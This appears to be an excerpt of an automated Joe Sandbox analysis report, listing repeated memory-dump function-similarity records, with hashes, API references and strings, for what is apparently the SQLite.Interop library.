                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: domain error
                                                                                                                                                                                                                                      • API String ID: 0-1959930803
                                                                                                                                                                                                                                      • Opcode ID: ac5da4084aec58ae44b8c7830d9bdf7ff5ba3746c73ed8614881ea3228c9a129
                                                                                                                                                                                                                                      • Instruction ID: 14e85ffb6d75421140c6f715de96d2e662a6c06036954e5ee4e74a51e22aacdd
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ac5da4084aec58ae44b8c7830d9bdf7ff5ba3746c73ed8614881ea3228c9a129
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 965137726283014BD700DE78D88165AF3E5EFC5328F2447A9E968C7281FF39DB498392
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • _memset.LIBCMT ref: 6BC25F63
                                                                                                                                                                                                                                      • _memset.LIBCMT ref: 6BC260A4
                                                                                                                                                                                                                                      • SIaa0f8e0c251cfd1d.SQLITE.INTEROP(00000000,?,?,?,?,?,?,?,6BC29267,?,?,00000000,00000000,?,6BC33CE9,00000000), ref: 6BC260F0
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _memset$Iaa0f8e0c251cfd1d.
                                                                                                                                                                                                                                      • String ID: 0
                                                                                                                                                                                                                                      • API String ID: 2593926388-4108050209
                                                                                                                                                                                                                                      • Opcode ID: c346cacff462dbb85401a777d09ed59a6b38c394a5161d68d8f8d96666018aea
                                                                                                                                                                                                                                      • Instruction ID: 295a45849c52e0a7bf0f78538369cc8f5d4f082b25f3f2be797a14522da8410f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c346cacff462dbb85401a777d09ed59a6b38c394a5161d68d8f8d96666018aea
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7D61C170E112159BEB04CFA8C881B5FB7B5AF45304F5480B8E919DF209F738DA45CBA1
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 6BC55DA0: SI769271af19a2299d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,NULL,?,6BC560BE), ref: 6BC55DB1
                                                                                                                                                                                                                                      • SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,00024A9C,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f), ref: 6BCB664E
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: I769271af19a2299d.
                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$misuse
                                                                                                                                                                                                                                      • API String ID: 2981141233-160653349
                                                                                                                                                                                                                                      • Opcode ID: 3d88cf449bb2f91611024e86815ce216b46930592f1e1e09a826e5734dbdc446
                                                                                                                                                                                                                                      • Instruction ID: 5f3cdc93f50f05c034763bf880c49fe84d631dfe81b5a224de0a6db76d6ff4d2
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3d88cf449bb2f91611024e86815ce216b46930592f1e1e09a826e5734dbdc446
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6971C370A11A549BDB10CF78C841B9EFBF0AF49318F0441E9D8589B341EB38EA99CF91
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • __startOneArgErrorHandling.LIBCMT ref: 6BBD1DCD
                                                                                                                                                                                                                                        • Part of subcall function 6BBD3AC0: __87except.LIBCMT ref: 6BBD3AFB
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ErrorHandling__87except__start
                                                                                                                                                                                                                                      • String ID: pow
                                                                                                                                                                                                                                      • API String ID: 2905807303-2276729525
                                                                                                                                                                                                                                      • Opcode ID: 5704eaf05de0ef85a389e90d6546ebb63d1c8bf7814bfd3627d5f6ec48385e80
                                                                                                                                                                                                                                      • Instruction ID: 996b23243d5f1e03183f00fe3c532c1d02b3a757bff79392270e0f8956e87330
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5704eaf05de0ef85a389e90d6546ebb63d1c8bf7814bfd3627d5f6ec48385e80
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 05515D71E0C2C197DB116B28C94135E3BB4DB41B51F588AD8E4E5421EAEF3CC4D98A46
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: separators$tokenchars
                                                                                                                                                                                                                                      • API String ID: 0-258404482
                                                                                                                                                                                                                                      • Opcode ID: 4e3f2ff081030ff86a6bbd32ce212a7cecee84f9eba31c7472b34772a93df420
                                                                                                                                                                                                                                      • Instruction ID: d629cf2997a14614d56e651b9c8594fff68a923276997b2c7bfa38054f9da05c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4e3f2ff081030ff86a6bbd32ce212a7cecee84f9eba31c7472b34772a93df420
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BF51583162D6424BDB05CE28D8403AABBE5FF82315F2400FEEC959B342F739CA159392
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SI769271af19a2299d.SQLITE.INTEROP(0000000B,%s at line %d of [%.10s],database corruption,0000F437,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f,?,?,?,?,?,?,?,?,6BC8593B), ref: 6BC55B20
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • %s at line %d of [%.10s], xrefs: 6BC55B19
                                                                                                                                                                                                                                      • database corruption, xrefs: 6BC55B14
                                                                                                                                                                                                                                      • fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC55B0A
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: I769271af19a2299d.
                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$database corruption$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f
                                                                                                                                                                                                                                      • API String ID: 2981141233-2469029621
                                                                                                                                                                                                                                      • Opcode ID: babc0fefd9d82330b3f49f7fd0875cda405cd83e3d0bef2db21702c4939211e3
                                                                                                                                                                                                                                      • Instruction ID: c095fcf44eb7136f0ce81a3f6cec956f98d4996416644f2ffcc7728bda07338b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: babc0fefd9d82330b3f49f7fd0875cda405cd83e3d0bef2db21702c4939211e3
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7551C032B11205ABD7009F65C885BAAB7B4EF40714F4481A5EE089B241F77CEB71CBE5
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,00018357,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f,?,?,?,?,?,6BC9F24C,?,?,?,6BC73680), ref: 6BC99E26
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • %s at line %d of [%.10s], xrefs: 6BC99E1F
                                                                                                                                                                                                                                      • fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC99E10
                                                                                                                                                                                                                                      • misuse, xrefs: 6BC99E1A
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: I769271af19a2299d.
                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$misuse
                                                                                                                                                                                                                                      • API String ID: 2981141233-160653349
                                                                                                                                                                                                                                      • Opcode ID: 4fcc013796147c65df48d2098ad46f7044701fb6a4eb93d310bc9d29daf36744
                                                                                                                                                                                                                                      • Instruction ID: c734f51e60c8341073a98dd487c384b6cc668020b7cdb34fbf8799c02147b834
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4fcc013796147c65df48d2098ad46f7044701fb6a4eb93d310bc9d29daf36744
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1441B6716142009FE724EFA8E881B5AB3E5EF84724F044669F959CB342F7B8EA058761
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 6BC55DA0: SI769271af19a2299d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,NULL,?,6BC560BE), ref: 6BC55DB1
                                                                                                                                                                                                                                      • SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,0002B2A3,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f), ref: 6BC6D5F0
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • %s at line %d of [%.10s], xrefs: 6BC6D5E9
                                                                                                                                                                                                                                      • fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC6D5DA
                                                                                                                                                                                                                                      • misuse, xrefs: 6BC6D5E4
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: I769271af19a2299d.
                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$misuse
                                                                                                                                                                                                                                      • API String ID: 2981141233-160653349
                                                                                                                                                                                                                                      • Opcode ID: 6e6eb3ff76ccf2fc196d1521b890562aa36f8c46caefbc78486b9ef2394e613c
                                                                                                                                                                                                                                      • Instruction ID: 2a5b97eebe84dbd5420f7418fe2eae8499031ea96515a57c87523a55d235f2bd
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6e6eb3ff76ccf2fc196d1521b890562aa36f8c46caefbc78486b9ef2394e613c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CB41E6B1BA52018FDB04CF25D8C1E4B37A5BFC5794F2484A8E91D8B345F638E911CB65
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SI769271af19a2299d.SQLITE.INTEROP(0000000B,%s at line %d of [%.10s],database corruption,0001030B,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f,?,6BC55C33,?,00000001,00000000), ref: 6BC554B7
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • %s at line %d of [%.10s], xrefs: 6BC554B0
                                                                                                                                                                                                                                      • database corruption, xrefs: 6BC554AB
                                                                                                                                                                                                                                      • fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC554A1
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: I769271af19a2299d.
                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$database corruption$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f
                                                                                                                                                                                                                                      • API String ID: 2981141233-2469029621
                                                                                                                                                                                                                                      • Opcode ID: 062130a8f32f529a6f1db27f65eae72062b228c938bb672d2ffb41354d09d7fc
                                                                                                                                                                                                                                      • Instruction ID: 0c78a4aba781d236004d556c91cdd2f23ad844d952e0694ed1bd6e54ec7a6eaf
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 062130a8f32f529a6f1db27f65eae72062b228c938bb672d2ffb41354d09d7fc
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4C41B372A152098BDB14CF88D5817AEB3B1FF84311F1040BDDA199B341F739AA71CB95
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SI769271af19a2299d.SQLITE.INTEROP(0000000B,%s at line %d of [%.10s],database corruption,000122A6,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f,00000000,00000000,?,00000000,?,6BC7A704,00000000,?,?,6BC7A7BA,00000000), ref: 6BC73C7B
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • %s at line %d of [%.10s], xrefs: 6BC73C74
                                                                                                                                                                                                                                      • database corruption, xrefs: 6BC73C6F
                                                                                                                                                                                                                                      • fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC73C65
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: I769271af19a2299d.
                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$database corruption$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f
                                                                                                                                                                                                                                      • API String ID: 2981141233-2469029621
                                                                                                                                                                                                                                      • Opcode ID: 36b34edddae7b03e0f9f93dbe30d0e8fc936eff60054ec34470c27f352b04ae2
                                                                                                                                                                                                                                      • Instruction ID: cdedb48134b1552774fd95512d3904796e0f231814e47d4042517b5660f1177f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 36b34edddae7b03e0f9f93dbe30d0e8fc936eff60054ec34470c27f352b04ae2
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2E41AB617586500AD330AF79A8817A2F7E0DB80716F4006FFD9D9C7681F31AE686C3A1
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SI769271af19a2299d.SQLITE.INTEROP(0000000B,%s at line %d of [%.10s],database corruption,000119B4,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f,74FF8504,6BC8AEB6,?,6BC8593B,?,?,?,?,?,?,6BC8AEB6), ref: 6BC637C4
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • %s at line %d of [%.10s], xrefs: 6BC637BD
                                                                                                                                                                                                                                      • database corruption, xrefs: 6BC637B8
                                                                                                                                                                                                                                      • fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC637AE
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: I769271af19a2299d.
                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$database corruption$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f
                                                                                                                                                                                                                                      • API String ID: 2981141233-2469029621
                                                                                                                                                                                                                                      • Opcode ID: 021b5c756582bdb525b31a0fb47351f25074aef863d2316f3fe0f2a53212a6fc
                                                                                                                                                                                                                                      • Instruction ID: 26fef1062688c92f083a61c5ff26af29f7a3b2d0a9b21a113cf23322ccb76699
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 021b5c756582bdb525b31a0fb47351f25074aef863d2316f3fe0f2a53212a6fc
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1131D672A152156BC710CF6CDC81DAA77A4EBC46A4F044169FD489B340FB38EE5587E2
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SI769271af19a2299d.SQLITE.INTEROP(0000000B,%s at line %d of [%.10s],database corruption,00010ED5,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f,?,?,00000000,?,?), ref: 6BC55273
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • %s at line %d of [%.10s], xrefs: 6BC5526C
                                                                                                                                                                                                                                      • database corruption, xrefs: 6BC55267
                                                                                                                                                                                                                                      • fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC5525D
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: I769271af19a2299d.
